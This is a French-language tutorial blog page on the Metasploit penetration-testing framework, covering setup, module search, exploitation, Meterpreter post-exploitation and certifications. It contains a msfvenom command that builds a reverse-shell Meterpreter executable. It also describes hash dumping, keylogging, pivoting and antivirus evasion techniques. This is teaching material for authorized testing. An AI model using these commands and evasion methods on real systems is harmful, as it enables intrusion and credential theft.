Metasploit : Guide Complet Pentesting 2026
Metasploit est le framework d’exploitation le plus utilisé dans le monde du pentesting professionnel. Depuis sa création par HD Moore en 2003, metasploit a révolutionné la façon dont les professionnels de la sécurité testent et documentent les vulnérabilités des systèmes. Ce guide complet couvre metasploit de ses fondamentaux jusqu’aux techniques avancées en 2026, avec des exemples pratiques et des conseils pour maîtriser ce framework incontournable.
Qu’est-ce que Metasploit Framework ?
Metasploit est un framework open source développé et maintenu par Rapid7. Il regroupe dans une interface unifiée des milliers de modules : exploits, payloads, auxiliaires, post-exploitation et encodeurs. Metasploit permet à un pentesteur de passer de la découverte d’une vulnérabilité à son exploitation en quelques commandes, sans avoir à développer ses propres exploits depuis zéro. La force de metasploit réside dans cette capacité à industrialiser le processus d’exploitation tout en maintenant une flexibilité maximale.
L’architecture de metasploit s’articule autour de plusieurs composants : msfconsole (l’interface principale en ligne de commande), msfvenom (génération de payloads personnalisés), l’API REST et Metasploit Pro (version commerciale). Le projet est documenté sur docs.metasploit.com, une référence maintenue par Rapid7 avec des exemples pratiques pour chaque module de metasploit.
Architecture et concepts fondamentaux de Metasploit
Comprendre metasploit nécessite de maîtriser son vocabulaire spécifique. Un exploit dans metasploit est le code qui tire parti d’une vulnérabilité précise dans un système cible. Un payload metasploit est le code exécuté sur la cible après l’exploitation réussie. Les payloads les plus courants dans metasploit sont Meterpreter (shell interactif avancé) et shell/reverse_tcp (shell basique). Un module auxiliaire dans metasploit sert à la reconnaissance, au scanning ou au fuzzing sans exploitation directe du système cible.
La base de données de metasploit intègre des milliers d’exploits référencés par CVE. La base CVE officielle, maintenue par le NIST sur nvd.nist.gov, est la source primaire que metasploit utilise pour documenter chaque vulnérabilité. Chaque module metasploit inclut des métadonnées précises : numéro CVE, date de publication, rang de fiabilité, plateformes cibles compatibles.
Installation et configuration de Metasploit
Metasploit est préinstallé dans Kali Linux, mais peut être installé sur n’importe quelle distribution Debian/Ubuntu via le script officiel Rapid7. La première étape est de configurer la base de données PostgreSQL que metasploit utilise pour stocker les résultats de scans et les sessions actives. Exécutez sudo systemctl start postgresql suivi de sudo msfdb init pour initialiser metasploit.
Cette initialisation crée la base de données metasploit et configure les droits d’accès nécessaires. Pour vérifier que metasploit communique correctement avec PostgreSQL, la commande db_status dans msfconsole doit afficher connected. Pour un environnement de lab complet avec metasploit, consultez notre guide HackTheBox qui détaille la configuration d’un réseau de machines vulnérables adapté à la pratique de metasploit.
Utilisation de Metasploit : workflow standard
Phase 1 : Importation des résultats Nmap dans Metasploit
Metasploit s’intègre nativement avec Nmap. La commande db_nmap -sV -sC cible exécute un scan Nmap et stocke automatiquement les résultats dans la base de données metasploit. Vous pouvez ensuite consulter les hôtes découverts avec la commande hosts et les services identifiés avec la commande services dans msfconsole. Cette intégration fait de metasploit une plateforme centralisée pour tout le workflow de pentest.
Phase 2 : Recherche de modules dans Metasploit
La commande search dans metasploit permet de filtrer les modules par CVE, nom, plateforme ou type. Par exemple, search type:exploit platform:windows ms17-010 retourne EternalBlue, l’exploit responsable de la propagation de WannaCry. Chaque résultat dans metasploit inclut un rang de fiabilité : excellent, great, good, normal, average. Choisir des modules de rang élevé dans metasploit améliore significativement les chances de succès.
Phase 3 : Configuration et exploitation avec Metasploit
Une fois le module sélectionné dans metasploit avec use [module], la commande show options liste les paramètres requis et optionnels. RHOSTS (cible), LHOST (machine attaquante) et LPORT sont les paramètres fondamentaux de tout module metasploit. La commande run ou exploit lance l’exploitation. En cas d’échec, metasploit affiche un message d’erreur détaillé qui oriente le diagnostic.
Phase 4 : Post-exploitation avec Meterpreter dans Metasploit
Meterpreter est le payload avancé de metasploit qui s’exécute entièrement en mémoire sur la cible sans toucher le disque dur. Depuis une session Meterpreter ouverte par metasploit, vous pouvez effectuer l’escalade de privilèges avec getsystem, le dumping de hashes d’authentification avec hashdump, la capture de screenshots, l’enregistrement des frappes clavier, et le pivoting vers d’autres machines du réseau interne.
Metasploit pour les tests d’applications web
Metasploit intègre de nombreux modules auxiliaires pour les applications web : scanners de vulnérabilités, testeurs d’injection SQL, fuzzer de paramètres HTTP. OWASP maintient un guide de test des applications web qui s’aligne parfaitement avec les modules metasploit disponibles, consultable sur owasp.org/www-project-web-security-testing-guide. Ce guide OWASP et metasploit sont complémentaires pour couvrir l’ensemble des vulnérabilités web critiques.
Le module auxiliary/scanner/http/dir_scanner de metasploit permet de découvrir les répertoires et fichiers sensibles exposés sur un serveur web. Associé à auxiliary/scanner/http/robots_txt, ces modules metasploit fournissent une cartographie rapide de la surface d’attaque web. Pour aller plus loin sur l’aspect authentification, notre article sur hacker un mot de passe complète ce volet de metasploit avec des techniques d’attaque sur les mots de passe.
Msfvenom : génération de payloads personnalisés avec Metasploit
Msfvenom est le générateur de payloads de metasploit. Il permet de créer des fichiers exécutables adaptés aux tests d’intrusion : exécutables Windows (.exe), applications Android (.apk), macros Office, scripts PowerShell malveillants. La commande type pour créer un reverse shell avec metasploit est la suivante : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o payload.exe. Cette commande metasploit génère un exécutable qui, une fois lancé sur la cible, ouvre une session Meterpreter vers votre machine.
Les encodeurs de metasploit permettent d’obfusquer les payloads pour contourner les antivirus basiques. Les techniques d’évasion avancées de metasploit incluent le staged vs stageless payload, le process injection et le reflective DLL injection. Le câble OMG documenté dans notre article spécialisé illustre comment des payloads metasploit peuvent être déployés via du hardware lors d’audits physiques complets.
Metasploit en CTF et formations professionnelles
Les compétitions CTF utilisent massivement metasploit pour les challenges d’exploitation système. Les plateformes TryHackMe et HackTheBox proposent des modules dédiés à l’apprentissage de metasploit dans des environnements légaux et contrôlés. Metasploit facilite l’apprentissage en abstrayant la complexité de l’exploitation tout en exposant les mécanismes fondamentaux de la sécurité offensive.
Pour les certifications professionnelles, metasploit est au cœur de l’examen OSCP d’Offensive Security, bien que la certification limite son usage à certaines machines. La maîtrise de metasploit est aussi requise pour les certifications GPEN (GIAC) et CEH (EC-Council). La page À propos de Hackathon HI Paris détaille les certifications recommandées pour les participants souhaitant progresser avec metasploit.
Metasploit et les techniques avancées d’évasion
Les systèmes de défense modernes comme les EDR (Endpoint Detection and Response) et les antivirus de nouvelle génération ont rendu plus complexe l’utilisation directe des payloads metasploit standard. En réponse, metasploit et la communauté sécurité ont développé des techniques d’évasion avancées. L’obfuscation des payloads metasploit peut se faire via des encodeurs multiples (option -i pour le nombre d’itérations), le chiffrement des payloads avec les options encrypt de msfvenom, ou l’injection dans des processus légitimes. Le process hollowing consiste à lancer un processus système légitime en état suspendu depuis metasploit, d’y injecter le payload puis de le reprendre. Le reflective DLL injection, technique phare de metasploit via Meterpreter, charge une bibliothèque directement en mémoire sans écrire de fichier sur le disque, contournant ainsi la majorité des solutions antivirus basées sur l’analyse de fichiers. Ces techniques avancées de metasploit sont enseignées dans les certifications OSCP et CRTO pour former des red teamers professionnels capables d’évaluer la résistance réelle des défenses d’une organisation.
Éthique et légalité avec Metasploit
Metasploit est un outil légal utilisé quotidiennement par des milliers de professionnels de la sécurité dans le monde entier. Son utilisation doit cependant respecter un cadre strict : autorisation écrite du propriétaire du système cible, périmètre d’audit clairement défini, rapport des vulnérabilités découvertes grâce à metasploit. Utiliser metasploit sans autorisation expose à des poursuites pénales sévères en France. Les bug bounty programs constituent le cadre légal idéal pour pratiquer metasploit de façon éthique et rémunérée.
Metasploit et la gestion des sessions multiples
L’un des atouts majeurs de metasploit est sa capacité à gérer simultanément de nombreuses sessions actives sur des machines compromises. La commande sessions dans msfconsole affiche toutes les connexions ouvertes par metasploit, qu’elles soient des shells standards ou des sessions Meterpreter avancées. Metasploit permet d’interagir avec une session spécifique via sessions -i [numéro], de la mettre en arrière-plan avec Ctrl+Z, et d’en ouvrir plusieurs en parallèle. Dans les scénarios de red team complexes, metasploit orchestre le pivoting entre les sessions : depuis une machine Windows compromise, metasploit peut router le trafic vers un sous-réseau inaccessible directement depuis l’attaquant, permettant d’atteindre des systèmes internes profonds. Cette gestion multi-sessions fait de metasploit bien plus qu’un simple lanceur d’exploits, c’est une véritable plateforme de coordination des opérations offensives lors d’un pentest étendu.
FAQ — Metasploit
Metasploit est-il gratuit ?
Metasploit Framework est open source et entièrement gratuit. Rapid7 propose également Metasploit Pro, une version commerciale avec interface graphique, reporting automatisé et fonctionnalités de collaboration en équipe. Pour la plupart des usages, metasploit Framework en ligne de commande est suffisant et complet.
Quelle est la différence entre Metasploit et un virus ?
Metasploit est un outil de test de sécurité légitime utilisé par des professionnels autorisés. Cependant, les payloads générés par metasploit peuvent déclencher les antivirus car ils utilisent des techniques similaires à celles des malwares réels. C’est précisément ce qui rend metasploit pertinent pour tester la résistance d’un système informatique aux attaques réelles.
Metasploit fonctionne-t-il sous Windows ?
Oui, metasploit est compatible Windows via un installateur natif fourni par Rapid7. Cependant, la majorité des pentesteurs préfèrent utiliser metasploit sous Kali Linux pour bénéficier d’un environnement cohérent, mieux documenté et avec tous les outils complémentaires préinstallés.
Combien d’exploits contient Metasploit ?
En 2026, metasploit contient plus de 2 400 exploits, 1 100 modules auxiliaires, 400 post-modules et 900 payloads. La base de metasploit est mise à jour régulièrement par la communauté et l’équipe Rapid7 dès qu’une nouvelle vulnérabilité critique est publiée dans la base CVE.
Comment apprendre Metasploit efficacement ?
La meilleure approche pour apprendre metasploit est de combiner la documentation officielle de Rapid7, les labs TryHackMe (parcours Metasploit dédié) et la pratique sur des machines HackTheBox. La progression recommandée pour maîtriser metasploit : commandes de base, Meterpreter, msfvenom, puis techniques d’évasion avancées.
— Équipe Hackathon HI Paris | Mise à jour : avril 2026
